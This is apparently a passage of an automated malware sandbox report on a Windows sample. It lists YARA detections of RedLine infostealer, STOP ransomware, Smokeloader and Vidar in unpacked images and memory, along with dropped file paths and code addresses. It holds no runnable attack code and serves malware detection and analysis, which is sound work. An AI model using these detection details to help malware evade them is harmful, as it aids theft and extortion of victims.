Source: Yara match File source: 13.2.405E.exe.810e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.405E.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.405E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.gecbfdt.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.505978851.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.475515508.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.403897156.0000000000820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.255442832.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: file.exe, 00000000.00000002.356947410.00000000008CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match File source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR

System Summary

Source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.510855251.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.539352220.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.426588359.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000E.00000000.432265249.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.505257421.00000000007A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.473163211.00000000022D7000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.357053208.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.512998427.0000000000968000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000000.507812417.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000000.430084061.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.468874148.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.356673245.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.444525144.0000000000889000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.508110815.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000000.427534356.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.510353848.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.466699994.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.442880266.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000E.00000002.469202987.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.540527249.0000000002E46000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.430570444.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000000.434348709.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.426731802.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.466941491.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000000.415949040.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000000.442875397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000002.535910271.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000000.428974978.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.504609430.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004022E9 0_2_004022E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418CFC 0_2_00418CFC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A886 0_2_0041A886
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041B4A1 0_2_0041B4A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139C7 0_2_004139C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E990 0_2_0040E990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419240 0_2_00419240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414270 0_2_00414270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041467C 0_2_0041467C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413E9C 0_2_00413E9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414A9C 0_2_00414A9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004187B8 0_2_004187B8
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004022E9 11_2_004022E9
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00418CFC 11_2_00418CFC
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041A886 11_2_0041A886
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041B4A1 11_2_0041B4A1
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004139C7 11_2_004139C7
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040E990 11_2_0040E990
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00419240 11_2_00419240
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00414270 11_2_00414270
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041467C 11_2_0041467C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00413E9C 11_2_00413E9C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00414A9C 11_2_00414A9C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004187B8 11_2_004187B8
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040DC11 12_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00407C3F 12_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418CCC 12_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00406CA0 12_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004028B0 12_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041A4BE 12_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418244 12_2_00418244
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00401650 12_2_00401650
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402F20 12_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004193C4 12_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418788 12_2_00418788
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402F89 12_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402B90 12_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004073A0 12_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E84AB 12_2_048E84AB
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D2DF7 12_2_048D2DF7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D7EA6 12_2_048D7EA6
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D8EC7 12_2_048D8EC7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DDE78 12_2_048DDE78
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D77D9 12_2_048D77D9
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D6F07 12_2_048D6F07
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EA725 12_2_048EA725
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E8F33 12_2_048E8F33
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D18B7 12_2_048D18B7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D786D 12_2_048D786D
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D3187 12_2_048D3187
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E89EF 12_2_048E89EF
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D31F0 12_2_048D31F0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D2B17 12_2_048D2B17
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: sqlite3.dll.18.dr Static PE information: Number of sections : 18 > 10
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
